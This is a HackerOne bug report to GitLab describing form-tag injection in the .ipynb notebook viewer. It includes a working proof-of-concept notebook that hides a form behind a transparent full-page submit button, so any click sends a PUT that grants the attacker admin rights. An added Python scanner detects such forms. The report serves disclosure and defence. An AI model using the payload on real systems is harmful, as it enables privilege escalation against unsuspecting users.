Issue any http requests when users view a .ipynb notebook and click anywhere
HackerOne report #1563379 by yvvdwf
on 2022-05-09, assigned to GitLab Team
Report
Summary
Hello,
The sanitization of the .ipynb notebook viewer does not exclude the `form` tag. Consequently attackers may introduce a form which allows sending arbitrary POST requests to the server. PUT, DELETE and PATCH requests can be achieved by setting the value of a `_method` field.
Attackers may also use the `class` attribute to turn the form's submit button into a topmost transparent layer that intercepts users' clicks. In the following example, users clicking anywhere on the webpage trigger a form submit.
Steps to reproduce
- In an existing project or create a new one, add a file, `notebook-test.ipynb` (you can change the basename but the `.ipynb` extension is important) with the following content:

```json
{
  "cells": [
    {
      "cell_type": "code",
      "source": [ "print(\"Hello world\")" ],
      "outputs": [
        {
          "data": {
            "text/html": [
              "<form action=/api/v4/users/5212593 method=post>",
              "<input name=_method value=PUT type=hidden>",
              "<input name=admin value=true type=hidden>",
              "<input type=submit class='fixed-top fixed-bottom text-hide gl-font-size-42 cursor-default' value='zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz'>"
            ]
          }
        }
      ]
    }
  ]
}
```
- After committing the file, view it and click anywhere on the webpage. You will see a POST request to `/api/v4/users/5212593`. This is an example to escalate my account as Admin.
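A defender-side check for the issue described above, added here as an example that is not part of the original report or of GitLab's code: it walks a notebook's `text/html` outputs with Python's stdlib HTML parser and reports form-related elements and hidden `_method` overrides, so a sanitizer test or review tool can catch this class of payload before it reaches a viewer. The sample notebook, including the `/api/v4/users/123` action path, is constructed.

```python
from html.parser import HTMLParser

# Elements that let notebook output submit requests on the viewer's behalf.
FORM_TAGS = {"form", "input", "button", "textarea", "select"}


class FormFinder(HTMLParser):
    """Collects every form-related start tag together with its attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in FORM_TAGS:
            self.findings.append((tag, dict(attrs)))


def html_outputs(notebook):
    """Yield (cell index, html string) for every text/html output in the notebook."""
    for index, cell in enumerate(notebook.get("cells", [])):
        for output in cell.get("outputs", []):
            html = output.get("data", {}).get("text/html")
            if html is None:
                continue
            # nbformat allows either one string or a list of lines here.
            yield index, "".join(html) if isinstance(html, list) else html


def scan_notebook(notebook):
    """Return one finding per form-related element found in text/html outputs."""
    findings = []
    for index, html in html_outputs(notebook):
        parser = FormFinder()
        parser.feed(html)
        findings.extend({"cell": index, "tag": tag, "attrs": attrs}
                        for tag, attrs in parser.findings)
    return findings


def method_overrides(findings):
    """HTTP verbs a form would emulate through hidden `_method` inputs."""
    return [f["attrs"].get("value") for f in findings
            if f["tag"] == "input" and f["attrs"].get("name") == "_method"]


# Constructed sample mirroring the report's payload; the action path is made up.
SAMPLE_NOTEBOOK = {"cells": [{"cell_type": "code", "source": ["print(1)"],
    "outputs": [{"data": {"text/html": [
        "<form action='/api/v4/users/123' method=post>",
        "<input name=_method value=PUT type=hidden>",
        "<input name=admin value=true type=hidden>",
        "<input type=submit class='fixed-top fixed-bottom text-hide' value='x'>"]}}]}]}
```

A sanitizer that is correct for this viewer should leave `scan_notebook` with no findings on its output; a non-empty result on sanitized HTML is a failing test.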
Impact
Attackers may trick users into performing unattended actions, such as (1) add attackers to Admin or a private group, (2) add attackers' SSH key, etc.
Examples
This example is in private mode, please tell me if you cannot access: https://gitlab.com/yvvdwf/xss/-/blob/master/notebook-form.ipynb
What is the current bug behavior?
The sanitization does not exclude the `form` tag.
What is the expected correct behavior?
The `form` tag should be excluded.
Output of checks
This bug happens on GitLab.com